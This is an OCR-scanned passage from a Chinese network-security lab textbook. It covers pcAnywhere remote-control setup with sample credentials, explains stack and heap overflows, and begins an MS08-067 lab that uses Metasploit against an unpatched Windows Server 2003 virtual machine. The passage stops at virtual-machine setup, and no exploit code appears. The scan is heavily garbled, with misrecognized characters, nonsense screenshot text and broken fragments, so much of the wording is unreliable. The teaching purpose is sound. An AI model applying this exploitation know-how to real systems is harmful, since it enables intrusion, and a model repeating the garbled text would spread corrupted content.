PC(Windows XP/Windows 7).1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 
Hp S 


(2) 复习 pcAnywhere 软件 的 操作 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,学 会 在 Windows 环境 下 安装 pcAnywhere, 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 已 安装 Windows 操作 系统 。 
预备 知识 


(1) 远程 控制 原理 及 基本 协议 。 
(2) 远程 控制 技术 概念 及 原理 。 


实验 步 又 


pcAnywhere 分 Full, Host 以 及 Remote 等 版 本 ,可 以 根据 实际 需要 选择 不 同 的 版 本 来 
安装 。 本 文 所 使 用 pcAnywhere 的 版 本 是 V12. 5。 

(1) 打开 pcAnywhere V12. 5 的 主 安装 文件 Symantec pcAnywhere v12. 5. exe, 出 现 安 
装 向 导 窗 口 , 如 图 4.2.1 所 示 。 
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图 421 pamere 2# FH 


(2) 单 击 * 下 一 步 ? 按 钮 :在 许可 协议 中 选择 "我 接受 许可 协议 中 的 条 款 ”, 并 单 击 “下 一 
步 " 按 钮 。 

(3) 在 客户 信息 中 填写 “用 户 名 ”和 “组 织 ”, 如 图 4. 2. 2 所 示 。 

OD 在 “安装 位 置 设置 "中 选择 pcAnywhere 的 安装 磁盘 位 置 ,使 用 默认 路 径 即 可 。 

C) 在 “ 自 定义 安装 ”中 ,作为 主机 管理 员 , 可 以 选择 典型 安装 , 即 主 机 管理 员 和 主机 管 
理 员 代理 。 但 作为 被 控 端 ,需要 同时 选择 这 两 项 ,如 图 4. 2.3 所 示 。 
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图 422 填写 用 户 名 和 组 织 名 称 注 册 


| 自 定 义 安装 
单 击 下 面 列表 中 的 图 标 更 改 功 能 的 安装 方式 





z] Symantec pcAnywhere 
EE] pcAnywhere 工具 
-2 主机 管理 员 





DEE 
TEE Poe he aha, FRE Windows Vista 验证 需求 ， 主 机 管理 员 


功能 大 小 需求 
此 功能 需要 174KB 硕 盘 空间 * 








图 423 安装 代理 管理 工具 

(6) 勾 选 Symantec pcAnywhere, 意 思 是 在 桌面 上 放置 pcAnywhere 的 快捷 方式 , 单 击 
“下 一 步 ? 按 钮 。 

(7) 安装 pcAnywhere 的 主要 程序 ,完成 pcAnywhere 的 安装 。 

(8) 双击 桌面 上 的 图 标 Symantec pcAnywhere, 打 开 软 件 运行 界面 ,如 图 4.2.4 所 示 。 

(9) 单 击 “ 转 到 高 级 视图 "。 界 面 左 侧 会 有 各 种 选择 项 ,如 图 4. 2. 5 所 示 。 

实验 报告 要 求 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 


。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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图 424 运行 界面 

















* symantec. 
Ba 图 [C\ProgramData\Symantec\pcAnywhere\Remotes z 
Coml 运程 控制 ka 
TCP/IP 文件 传送 o 
com 运程 控制 eo 
TCMIP 运程 控制 e 
TIR 远程 管理 E> 
TCP/I 192 168.1 240 运程 控制 eo 











图 425 pcAnywhere 高 级 视图 
4.2.2 配置 被 控 端 (hosts) 
实验 器 材 


pcAnywhere 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 台 。 
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预习 要 求 


CD 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 
(2) 复习 pcAnywhere 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,学 会 在 Windows 环境 下 安装 pcAnywhere 被 控 端 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 已 安装 Windows 操作 系统 。 
预备 知识 


COD 远程 控制 原理 及 基本 协议 。 
(2) 远程 控制 技术 概念 及 原理 。 


Sis p 


通过 选择 主机 下 的 添加 功能 自 定义 配置 被 控 端 计算 机 。 
选择 软件 运行 界面 中 的 主机 后 , 单 击 “ 操 作 ” 面 板 中 的 “添加 ”, 进 入 被 控 端的 连接 向 导 , 选 
择 “ 我 想 使 用 电缆 调制 解 调 器 /DSL/LAN/ 拨 号 互联 网 ISP”, 单 击 “ 下 一 步 ” 按 钮 ,如 图 4. 2. 6 
所 示 。 
e 


a 





您 想 为 该 连接 使 用 哪 种 连接 方法 ? 


我 想 使 用 电 绕 调制 解 调 器 /DSL/LAN/ 拨 号 互联 网 ISP C) 。 
c PgR ROAR EE o erossiuUl 


这 要 了 解 关于 不 同 连 接 方法 的 更 多 信息 ， LIEU 


要 继续 ， 请 单 击 “ 下 一 步 “。 





m | wm | 


图 426 添加 被 控 端 选项 


选择 连接 模式 ,选择 等待 有 人 呼叫 我 ”, 如 图 4.2. 7 所 示 。 
验证 类 型 选择 第 一 个 单 选 按钮 则 使 用 Windows 现 有 账户 ,选择 第 二 个 单 选 按钮 则 创建 
pcAnywhere 新 的 用 户 和 密码 ,如 图 4. 2. 8 所 示 。 
在 此 过 程 中 ,需要 选择 账户 ,如 图 4. 2.9 所 示 。 
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C Sea ARE 
C pM S—Ent 
运程 下 地 址 


一 一 一 一 一 


要 继续 ,请 单 击 “ 下 一 步 '。 





xa | m] 


图 427 连接 呼叫 选项 


您 想 使 用 什么 验证 类 型 ? 


C 我 想 使 用 一 个 现 有 的 Windows AEF UH) o 
C 我 想 创建 一 个 用 户 名 和 密码 由。 


要 继续 ， 请 单 击 “下 一 步 。 





wa | omm | 


图 428 建立 账户 











ae pcAnywhere 已 检测 到 当前 在 您 本 地 计算 机 上 可 用 的 帐 


您 起 让 远程 所 者 使 用 哪个 本 地 账户 0)? 
[ac | 


要 继续 ， 请 单 击 “ 下 一 步 。 








ZESm [Sm] ma | ww | 


图 429 选择 账户 


单 击 “ 下 一 步 "按钮 ,账户 创建 完成 。 允 许 用 户 再 次 确认 连接 选择 ,并 选择 是 否 连 接 完成 
后 等 待 来 自 远 程 计算 机 的 连接 。 在 创建 新 主机 完 后 ,程序 会 提示 对 新 主机 进行 命名 ,例如 ， 
命名 为 student。 选 中 需要 配置 的 连接 项 目 , 右 击 , 在 快捷 菜单 中 选择 “属性 ?命令 ,更 改 属 
性 ,如 图 4. 2. 10 所 示 。 


ateStart iaaa id 
Direct bs HERO: fo z # 


Modem 
Network, Cable, z : i - 








G 等 待 任何 人 D 
C 取消 主机 00 
EL py tiles 
© ARR) © RAI 
C 重新 启动 主机 计算 机 00 € en: meno 
C teri E) C 读 定 计算 机 了 
广 三 使 用 目录 服务 0) 
I zl 
多 个 监视 器 
选择 监控 1 本 









































x | cmo | mm 
图 4210 属性 配置 窗口 





属性 窗口 中 的 “连接 信息 ” 指 的 是 建立 连接 时 所 使 用 的 协议 。 一 般 默认 为 TCP/IP, 可 
以 根据 实际 需要 选择 合适 的 协议 ,本 实验 以 常见 的 TCP/IP 协议 为 例 ,如 图 4.2.11 所 示 。 


连接 方法 
C 等 待 传 入 的 连接 W 
个 插 按 到 一 个 pcAnywhere Access Server 


详细 信息 QD | 


个 连接 到 另 一 台 计 算 机 W: 


和 si 


[cp | 
口 使 用 CAPI 2.0 的 ISDN 











4211 确定 连接 协议 
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远程 控制 中 ,被 控 端 只 有 建立 安全 机 制 , 才 能 有 效 地 保护 系统 不 被 恶意 控制 所 破坏 。 
“设置 ?选项 卡 中 的 主要 选项 如 下 : 
* "Bi Windows 一 起 启动 "和 "运行 最 小 化 ” 指 的 是 被 控 端 配置 好 以 后 ,决定 是 否 下 次 
启动 计算 机 时 就 直接 启动 pcAnywhere, 并 且 让 pcAnywhere 最 小 化 。 
。“ 会 话 非 正常 结束 后 ” 指 的 是 在 连接 会 话 不 正常 的 情况 下 (比如 连接 突然 中 断 ) 是 放 
弃 连 接 还 是 等 待 下 一 次 连接 。 
。“ 且 由 以 下 确保 安全 ” 指 的 是 为 了 保护 本 机 安全 ,可 以 选择 锁定 用 户 、 不 允许 其 他 的 
控制 端 登录 或 重新 启动 计算 机 等 。 
呼叫 者 指 的 是 可 以 创建 连接 到 本 机 的 用 户 账号 及 密码 。 在 “呼叫 者 ”选项 卡 中 设置 允许 
哪些 用 户 能 够 进行 远程 控制 以 及 分 配 控制 权限 , 单 击 * 新 建 ? 按 钮 ,弹出 设置 新 用 户 的 对 话 
框 ,设置 好 一 个 新 的 用 户 名 、 登 录 密 码 以 及 相应 的 权限 , 单 击 “ 确 定 ” 按 钮 保存 ,如 图 4. 2. 12 
所 示 , 验 证 类 型 选择 pcAnywhere, 


连接 信息 | 设置 。 呼叫 者 | 安全 选项 | me | 会 议 | 注释 | 保护 顺 目 | 





ee z] 
呼叫 者 列表 O: 
| axem 





次 要 呼叫 者 属性 O 





图 4212 呼叫 者 设置 


图 4.2.13 中 的 用 户 teacher 就 是 在 创建 连接 向 导 时 创建 的 用 户 , 如 果 有 需要 可 以 单 
击 科 按 钮 进行 新 用 户 的 添加 。 同 样 可 以 双击 用 户 设置 用 户 的 安全 设置 ,如 修改 密码 (如 
图 4. 2. 13 所 示 ) 设置 用 户 特权 及 打开 必要 的 管理 密码 。 
“安全 ”选项 卡 用 于 设置 本 机 的 安全 策略 。 
。 连接 选项 : 连接 成 功 以 后 ,可 以 选择 是 否 清除 本 机 屏幕 上 的 显示 ;是 否 相隔 确定 时 
间 确 认 一 次 连接 是 否 仍 然 有 效 ( 提 示 确 认 连 接 )。 
。 登录 选项 : 可 以 限制 对 本 机 进行 登录 的 次 数 与 时 间 , 上 默认 值 是 每 个 人 只 人 允许 登录 
3 次 ,每 一 次 登录 所 用 的 时 间 是 3 分 钟 。 
“保护 项 目 ” 选 项 卡 允 许 用 户 输入 密码 来 保护 当前 设置 的 被 控 端 选项 ,设置 密码 保护 后 ， 
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呼叫 者 St EE 
标识 em še | 注释 | 保护 项 目 | 









SAO: teacher 
ZBP): 和 | 
WEB On) fee 











图 4213 修改 用 户 密码 


任何 人 试图 查看 或 更 改 该 被 控 端 的 选项 时 都 需要 输入 密码 来 确认 。 以 上 属性 都 配置 好 以 
后 , 单 击 “ 确 定 ”按钮 完成 被 控 端 设置 。 

右 击 被 控 端 图 标 , 在 快捷 菜单 中 选择 “运用 主机 ”命令 ,被 控 端 将 启动 并 在 系统 任务 栏 上 
显示 一 个 计算 机 形状 的 图 标 ,开始 等 待 远程 控制 的 被 控 端 进行 连接 。 当 用 户 远 程 连接 时 ,图 
标 会 改变 颜色 。 


实验 报告 要 求 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 

4.2.3 配置 主 控 端 (Remotes) 
实验 器 材 

pcAnywhere 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 台 。 
预习 要 求 


(1) 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 
(2) 复习 pcAnywhere 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,学 会 在 Windows 环境 下 安装 pcAnywhere 的 主 控 端 。 
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实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 已 安装 Windows 操作 系统 。 
预备 知识 


(1) 远程 控制 原理 及 基本 协议 。 
(2) 远程 控制 技术 概念 及 原理 。 


实验 步 又 


设置 好 被 控 端 后 , 接 下 来 十 分 重要 的 工作 就 是 配置 主 控 端 计算 机 。 

(1) 在 如 图 4.2.5 所 示 的 pcAnywhere 管理 器 窗口 中 单 击 “ 远 程 ”, 通 过 这 个 页 面 可 以 
完成 主 控 端 连接 项 目的 设置 。 单 击 下 面 的 “添加 ”, 在 向 导 中 输入 被 控 端 计算 机 的 IP 地 址 ， 
如 图 4.2. 14 所 示 。 





您 要 连接 的 计算 机 的 Tr 地 址 是 什么 I)? 





GA a a 


Sus. FRE T o 








má | m] 
图 4214 指定 被 控 端 计算 机 





单 击 " 下 一 步 ” 按 钮 完成 主 控 端的 添加 ,程序 提示 对 名 称 进行 重 命名 ,例如 student, 
(2) 选中 需要 配置 的 连接 项 目 , 右 击 , 在 快捷 菜单 中 选择 “属性 ”命令 弹出 配置 对 话 框 。 
该 对 话 框 中 共有 5 个 选项 卡 可 供 设 置 。 
“连接 信息 ”选项 卡 的 设置 方式 和 内 容 与 被 控 端 的 设置 基本 相同 ,不 同 的 是 主 控 端 只 能 
够 选择 一 种 连接 方式 ,同时 在 选项 卡 上 还 可 以 设置 “启动 模式 ”, 如 其 中 的 “文件 传送 " 单 选 按 
钮 ,选中 之 后 可 以 达到 与 被 控 端 连接 时 直接 进入 文件 传输 界面 ,而 不 进入 远程 操作 界面 的 效 
果 , 如 图 4. 2.15 所 示 。 
“设置 ”选项 卡 用 于 配置 远程 连接 选项 。 其 中 ,“ 要 控制 的 网 络 主机 PC sk IP 地 址 ” 填 人 
受 控制 的 远程 计算 机 的 主机 名 或 IP 地 址 ,如 图 4. 2. 16 所 示 。 
。“ 要 控制 的 主机 PC 的 电话 号 码 ”: 如 果 远 程 计算 机 采用 Modem 拨号 呼叫 ,在 这 里 就 
要 填 人 远程 计算 机 的 电话 号 码 。 
。“ 登 录 信 息 ”: 连接 后 自动 登录 到 被 控 端 , 添 人 完整 的 登录 信息 后 ,就 可 以 保存 登录 
到 远程 被 控 端 所 需 的 用 户 账号 与 密码 ,从 而 实现 自动 登录 。 
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图 4215 连接 信息 设置 
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图 4216 远程 控制 设置 


其 中 ,192. 168. 1. 240 是 被 控 端 的 IP 地 址 ,student 为 对 方 的 用 户 和 密码 。 

。 自动 化 任务 : 用 于 设置 使 用 该 连接 的 自动 化 任务 。 在 12. 5 的 新 版 本 中 弱化 了 这 个 
功能 。 主 要 是 将 远程 控制 过 程 中 的 操作 记录 下 来 ,在 需要 的 时 候 回放 查看 。 

。 安全 选项 : 用 于 设置 主 控 端 在 远程 控制 过 程 中 使 用 的 加 密级 别 ,默认 是 不 加 密 的 。 
可 以 按 自己 的 需要 选择 使 用 对 称 密 钥 、 公 用 密 钥 或 pcAnywhere 加 密 方式 ,其 中 ， 
pcAnywhere 加 密 方式 将 前 面 的 两 种 加 密 技 术 结 合 在 一 起 ,具有 速度 和 安全 性 两 方 
面 的 优点 。 

。 保护 项 目 : 功能 与 被 控 端 的 设置 相同 。 

(3) 设置 完毕 后 , 右 击 主 控 端 ,在 快捷 菜单 中 选择 “开始 远程 控制 "命令 , 即 可 自动 连接 
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至 远程 主机 的 桌面 ,实现 安全 的 桌面 远程 操作 。 
作为 被 控 端 ,在 “主机 ”中 双击 新 建 主机 (student) 即 可 ,任务 栏 的 右 下 角 会 有 图 标 提示 。 
作为 主 控 端 ,选中 “远程 ”中 的 student, 单 击 左 侧 的 “启动 连接 ”, 或 者 双击 student, 出现 
如 图 4.2.17 所 示 的 界面 。 用 户 名 就 是 登录 名 teacher. 密码 就 是 登录 密码 123456。 启 动 远 
旦 控制 后 , pcAnywhere 就 开始 按照 设置 的 要 求 尝试 连接 远 端 的 被 控 计算 机 ,如 图 4. 2. 17 
所 示 。 
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图 4217 远程 连接 显示 





:连接 成 功 后 将 按 要 求 进入 远程 控制 界面 或 者 文件 传送 界 
被 控 计 算 机 ， 
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4218 远程 控制 界面 


实验 报告 要 求 


。 实验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
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。 阐述 收获 与 体会 。 
4.3 远程 控制 扩展 实验 


实验 器 材 


pcAnywhere 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 £i. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 
(2) 复习 pcAnywhere 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

利用 pcAnywhere 软件 对 远程 计算 机 进行 控制 。 

实验 环境 

安装 Windows 系统 和 pcAnywhere 软件 (包含 被 控 端 和 主 控 端 ) 的 两 台 局 域 网 PC。 
por 


1. 从 机 (被 控 端 ) 的 pcAnywhere 基本 配置 

CD 通信 双方 : 一 方 为 主 控 端 (主机 ) , 另 一 方 为 被 控 端 (从 机 ) 。 

(2) 启动 从 机 的 pcAnywhere, 在 工具 栏 单 击 “ 被 控 端 ", 再 右 击 工作 区 的 “NETWORK， 
CABLE,DSL” 选 项 ,在 快捷 菜单 中 选择 “属性 ”命令 。 其 中 ,默认 协议 设 为 TCP/IP, 不 要 
更 改 。 

(3) 选择 “呼叫 者 ”, 在 “验证 类 型 "下拉 列表 中 选 pcAnywhere, 右 击 呼叫 者 列表 ,在 快捷 
菜单 中 选择 “新 建 "命令 。 

(4) 输入 新 建 用 户 的 登录 名 和 密码 (主机 呼叫 从 机 时 用 到 ), 只 有 拥有 此 登录 名 和 密码 
的 主机 才能 呼叫 并 控制 从 机 。 系 统 默认 的 权限 是 主机 可 完全 控制 。 

(5) 修改 被 控 端 的 用 户 登 录 密 码 , 修 改 部 分 系统 环境 。 

2. 主机 ( 主 控 端 ) 的 pcAnywhere 基本 配置 

CD 启动 从 机 的 pcAnywhere, 在 工具 栏 单 击 “ 主 控 端 ", 再 右 击 工 作 区 的 “NETWORK， 
CABLE,DSL” 选 项 ,在 快捷 菜单 中 选择 “属性 ”命令 。 其 中 ,默认 协议 设 为 TCP/IP, 不 要 
更 改 。 

(2) 选择 “设置 ”, 在 “要 控制 的 网 络 主机 PC 或 IP 地 址 ”后 输入 从 机 的 IP 地 址 并 单 击 
“确定 ”按钮 。 

3. 远程 控制 的 实施 

CD 运行 从 机 的 pcAnywhere, HFE“ FE sim" XU; “NETWORK, CABLE, DSL”, IR 
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从 机 现在 处 于 等 待 状态 ,随时 接受 主机 的 呼叫 。 

(2) 运行 主机 的 pcAnywhere, 选择 “ 主 控 端 ", 双 击 “NETWORK,CABLE,DSL”, 程 序 
执行 结果 因 主 控 端 的 设置 分 两 种 : 

。 若 主 控 端 未 设 从 机 IP 地 址 , 则 主 控 端 自 动 扫 描 所 有 “等 待 连接 ”的 从 机 。 

。 车主 控 端 设置 了 从 机 的 IP 地 址 , 则 显示 登录 信息 ,只 要 用 户 名 和 密码 通过 从 机 的 验 

证 ,主机 就 可 顺利 取得 对 从 机 的 控制 权 , 同 时 在 主机 屏幕 中 显示 从 机 的 桌面 。 

4. 在 主机 上 对 从 机 进行 操纵 

CD 单 击 工 具 栏 中 的 “ 改 为 全 屏 显 示 ” 按 钮 ,可 全 屏 显示 从 机 的 桌面 而 隐藏 主机 的 “ 开 
始 ”" 菜 单 和 任务 栏 。 

(2) 单 击 工具 栏 中 的 “文件 传送 ”按钮 ,左边 显示 的 是 主机 资源 ,右边 为 从 机 资源 ,利用 
鼠标 的 拖 放 功能 可 实现 文件 的 双 机 互相 复制 。 

(3) 单 击 工 具 栏 中 的 “查看 修改 联机 选项 ”按钮 ,设置 锁定 从 机 键盘 , 单 击 工具 栏 中 的 
“结束 远程 控制 对 话 ” 按 钮 。 


实验 报告 要 求 


。 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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^ 53€ MS08-067 漏洞 攻击 实验 


5.1 预备 知识 


内 存 攻击 指 的 是 黑客 利用 操作 系统 等 软件 的 漏洞 ,构造 恶意 输入 ,导致 软件 在 处 理 输入 
数据 时 出 现 非 预期 的 错误 ,将 输入 数据 写 人 内 存 中 的 某 些 特定 敏感 位 置 , 从 而 劫持 软件 控制 
流 , 转 而 执行 外 部 输入 的 非 安全 的 指令 代码 ,造成 所 在 系统 被 获取 远程 控制 或 者 被 拒绝 服 
务 。 内 存 攻击 的 表面 原因 是 软件 编写 错误 ,例如 过 滤 输入 的 条 件 设 置 缺陷 ,变量 类 型 转换 错 
误 、 人 逻辑 判断 错误 ,指针 引用 错误 等 ,但 究 其 原因 是 现代 电子 计算 机 在 实现 图 灵机 模型 时 没 
有 在 内 存 中 严格 地 区 分 数据 和 指令 ,这 就 存在 程序 将 外 部 输入 数据 作为 指令 代码 而 被 执行 
的 可 能 。 任 何 操作 系统 级 别 的 防护 措施 都 不 可 能 完全 根除 现代 计算 机 体系 结构 上 的 这 个 浆 
端 ,而 只 是 试图 去 阻止 攻击 者 利用 此 弊端 攻击 计算 机 。 


5.1.1 缓冲 区 溢出 


通常 情况 下 ,缓冲 区 溢出 的 数据 只 会 破坏 程序 数据 ,造成 意外 终止 。 但 是 如 果 有 人 精心 
构造 溢出 数据 的 内 容 , 那 么 就 有 可 能 获得 系统 的 控制 权 。 

缓冲 区 在 系统 中 的 表现 形式 是 多 样 的 ,高 级 语言 定义 的 变量 数组 .结构 体 等 在 运行 时 
都 是 保存 在 缓冲 区 内 的 ,因此 ,缓冲 区 可 以 更 抽象 地 理解 为 一 段 可 读 写 的 内 存 区 域 ,缓冲 区 
攻击 的 最 终 目的 就 是 希望 系统 能 执行 这 块 可 读 写 内 存 中 已 经 被 蓄意 设 定好 的 恶意 代码 。 按 
照 汉 。 诺 依 曼 存储 程序 原理 ,程序 代码 是 作为 二 进 制 数 据 存储 在 内 存 的 ,同样 程序 的 数据 也 
在 内 存 中 ,因此 ,直接 从 内 存 的 二 进 制 形 式 上 是 无 法 区 分 哪些 是 数据 哪些 是 代码 的 ,这 也 为 
缓冲 区 游 出 攻击 提供 了 可 能 。 

一 般 根据 缓冲 区 溢出 的 内 存 位 置 的 不 同 , 将 缓冲 区 溢出 又 分 为 栈 溢出 和 堆 溢 出 。 


5.1.2 栈 溢出 


栈 作 为 一 种 数据 结构 ,是 一 种 只 能 在 一 端 进行 插入 和 删除 操作 的 特殊 线性 表 。 它 按照 
先进 后 出 的 原则 存储 数据 ,先进 入 的 数据 被 压 入 栈 底 , 最 后 的 数据 在 栈 顶 ,需要 读数 据 的 时 
候 从 栈 顶 开始 弹出 数据 (最 后 一 个 数据 被 第 一 个 读 出 来 , 即 * 后 进 先 出 > 。 栈 具有 记忆 作用 ， 
对 栈 的 插入 与 删除 操作 中 ,不 需要 改变 栈 底 指针 。 

在 计算 机 系统 中 , 栈 是 一 个 具有 以 上 属性 的 动态 内 存 区 域 。 程 序 可 以 将 数据 压 人 栈 中 ， 
也 可 以 将 数据 从 栈 顶 弹出 。 压 栈 的 操作 使 得 栈 顶 的 地 址 减 小 ,从 栈 顶 弹出 操作 使 得 栈 顶 的 
地 址 增 大 。 

栈 在 程序 的 运行 中 有 着 举足轻重 的 作用 。 最 重要 的 是 , 栈 保存 了 一 个 函数 调用 时 所 需 
要 的 维护 信息 , 常 称 之 为 堆栈 帧 或 者 活动 记录 。 

堆栈 帧 一 般 包含 如 下 几 方 面 的 信息 : 

。 函数 的 返回 地 址 和 参数 。 
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* 临时 变量 ,包括 函数 的 非 静 态 局 部 变量 以 及 编译 器 自动 生成 的 其 他 临时 变量 。 
栈 溢出 发 生 在 程序 向 位 于 栈 中 的 内 存 地 址 写 数据 , 当 写 入 的 数据 长 度 超过 栈 分 配给 组 
冲 区 的 空间 时 就 会 造成 栈 浇 出 。 从 栈 溢 出 的 原理 出 发 ,攻击 者 可 以 找到 如 下 集中 方式 来 利 
用 这 种 类 型 的 漏洞 : 
。 徐 盖 缓冲 区 附近 的 程序 变量 ,改变 程序 的 执行 流程 和 结果 ,从 而 达到 攻击 者 的 目的 。 
。 和 窗 盖 栈 中 保存 的 函数 返回 地 址 ,修改 为 攻击 者 指定 的 地 址 , 当 程 序 返 回 时 ,程序 流程 
将 跳 转 到 攻击 者 指定 的 地 址 ,理想 情况 下 可 以 执行 任何 代码 。 
。 覆盖 某 个 函数 指针 或 者 程序 异常 处 理 结 构 , 只 要 溢出 之 后 目标 函数 或 者 异常 处 理 例 
程 就 将 被 执行 ,同样 可 以 让 程序 流程 跳 转 到 任意 地 址 。 


5.1.3 HH 


不 同 于 栈 , 堆 是 程序 运行 时 动态 分 配 的 内 存 , 用 户 通过 malloc(C 语言 ) »new (Java 语言 
等 ) 等 函数 申请 内 存 , 通 过 返回 的 起 始 地 址 指针 对 分 配 的 内 存 进行 操作 ,使 用 完成 后 要 通过 
free 等 函数 释放 这 部 分 内 存 ,否则 会 造成 内 存 泄漏 。 

堆 的 操作 分 为 分 配 、 释 放 和 合并 3 种 。 因 为 堆 在 内 存 中 位 置 不 固定 ,大 小 比较 自由 ,多 
次 申请 和 释放 后 可 能 会 更 加 混乱 ,系统 从 性 能 、 空 间 利用 率 以 及 安全 的 角度 考虑 来 管理 堆 。 
下 面 通过 其 中 的 空闲 堆 块 操作 进行 简要 介绍 。 

系统 按照 堆 块 大 小 不 同 维护 一 系列 的 堆 块 。 而 堆 块 又 分 为 块 首 和 数据 区 ,其 中 空闲 堆 
块 数据 区 的 前 两 个 双 字 分 别 是 双向 链表 的 两 个 指针 。 通 常 同样 大 小 的 空闲 堆 块 通过 双向 链 
表 连 接 在 一 起 ,分 配 与 释放 堆 , 分 别 对 应 插入 与 删除 双向 链表 节点 的 操作 ,而 合并 则 会 同时 
进行 这 两 种 操作 。 

空闲 堆 块 中 ,两 个 指针 Previous block 和 Next block 分 别 指 向 双向 链表 中 此 堆 块 的 前 
后 两 个 空闲 堆 块 的 数据 部 分 。 分 配 一 个 堆 块 时 ,将 分 配 堆 块 从 空闲 堆 块 双 链表 中 删除 。 同 
一 个 堆 中 的 堆 块 在 内 存 中 通常 是 连续 的 ,因此 很 可 能 发 生 以 下 情况 : 在 向 一 个 已 分 配 堆 块 
中 写 人 数据 时 ,由 于 数据 长 度 超过 了 所 在 堆 块 的 大 小 ,导致 数据 溢出 覆盖 了 堆 块 后 方 相 邻 的 
空闲 堆 块 ,而 包含 的 堆 块 的 两 个 前 后 指针 就 会 被 覆盖 或 者 部 分 覆盖 。 

假设 有 这 样 一 个 空闲 堆 块 , 它 的 前 后 堆 块 指针 被 覆盖 。 也 就 是 说 ,本 来 应 该 指向 该 堆 块 的 
前 一 个 堆 块 和 后 一 个 堆 块 的 数据 被 改写 ,替换 成 了 其 他 的 数据 。 而 如 果 紧 接着 这 个 空闲 堆 块 
被 分 配 出 去 ,需要 将 这 个 空闲 堆 块 从 空闲 堆 块 的 链表 中 删除 。 那 么 在 分 配 的 过 程 中 
DeleteBlock 函数 就 会 将 该 节点 的 下 一 个 节点 的 前 向 指针 指向 该 节点 之 前 的 空闲 块 的 前 向 指 
针 , 从 而 知道 ,每 个 堆 块 指针 指向 的 就 是 堆 块 的 前 向 块 。 因 此 ,这 个 动作 相当 于 就 是 对 该 节点 
的 解 引用 。 也 就 是 说 ,该 节点 的 后 向 指针 所 对 应 的 地 址 的 内 容 , 其 实 就 是 前 向 指针 所 在 位 置 的 
数据 。 








5.2 MS08-067 漏洞 攻击 实验 


实验 器 材 
Back Track5 的 镜像 文件 ,1 套 。 


VMware 虚拟 机 软件 ,1 套 。 
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Windows Server 2003 SPO 镜像 文件 ,1 套 。 
实验 任务 
通过 本 实验 ,掌握 针对 内 存 泄漏 攻击 的 相关 知识 。 
实验 环境 


一 台 安 装 了 VMware 虚拟 机 软件 的 Windows 7 操作 系统 的 计算 机 ,BT5(Back Track 
five) 系统, 以 及 Windows Server 2003 SPO 靶 机 系统 。 


预备 知识 


2008 4E 10 月 24 日 凌晨 ,联想 网 御 安全 服务 部 攻防 研究 团队 在 监测 系统 安全 状态 过 程 
中 ,发现 Windows Server 服务 远程 RPC 栈 溢出 漏洞 (MS08-067)。 这 是 在 Windows 操作 
系统 下 的 Server 服务 在 处 理 RPC 请 求 过 程 中 存在 的 一 个 严重 漏洞 ,远程 攻击 者 可 以 通过 
发 送 恶 意 RPC 请 求 触发 这 个 溢出 ,导致 完全 入 侵 用 户 系统 ,并 以 SYSTEM 权限 执行 任意 
指令 并 获取 数据 ,造成 系统 失窃 及 系统 崩溃 等 严重 问题 。 


实验 步 又 


使 用 Metasploit 框架 中 的 MS08-067 渗透 攻击 模块 ,对 一 台 自 己 架 设 的 还 没有 使 用 
DEP 与 ASLR 安全 防护 机 制 的 Windows Server 2003 SPO 靶 机 进行 渗透 实验 。 

1. Windows Server 2003 SPO 靶 机 架设 

Windows Server 2003 是 Microsoft 公司 基于 Windows XP/NT5. 1 开发 的 服务 器 操作 
系统 ,于 2003 年 3 月 28 日 发 布 ,并 在 同年 4 月 底 上 市 。 相 对 于 Windows 2000 做 了 很 多 
改进 。 

Windows Server 2003 的 官方 支持 已 在 2015 年 7 月 14 日 结束 ,Windows Server 2003 
的 安全 性 不 再 获得 保障 ,此 处 是 作为 实验 用 软件 进行 安装 。 

(1) 从 网 上 下 载 无 任何 SP 补丁 的 Windows Server 2003 镜像 文件 ,保存 到 本 地 待 接 下 
来 安装 到 VMware 虚拟 机 中 。 

(2) 打开 VMware 虚拟 机 软件 ,出 现 安装 向 导 窗 口 , 单 击 “ 创 建新 的 虚拟 机 ”选项 ,出 现 
图 5.2.1 所 示 的 “新 建 虚拟 机 向 导 ” 界 面 ,通过 本 向 导 来 创建 一 个 新 的 虚拟 机 。 

(3) 在 配置 类 型 中 ,选择 “ 自 定义 (高 级 )(C)”, 并 单 击 " 下 一 步 ”按钮 ,出 现 如 图 5.2.2 所 
示 的 “选择 虚拟 机 硬件 兼容 性 ”界面 。 

(4) 在 “选择 虚拟 机 硬件 兼容 性 ”界面 中 ,选择 默认 的 硬件 兼容 性 , 即 Workstation 12. 0 
即 可 , 单 击 “ 下 一 步 " 按 钮 。 

(5) 在 出 现 的 如 图 5. 2. 3 所 示 的 “安装 客户 机 操作 系统 "界面 中 ,选择 “安装 程序 光盘 影 
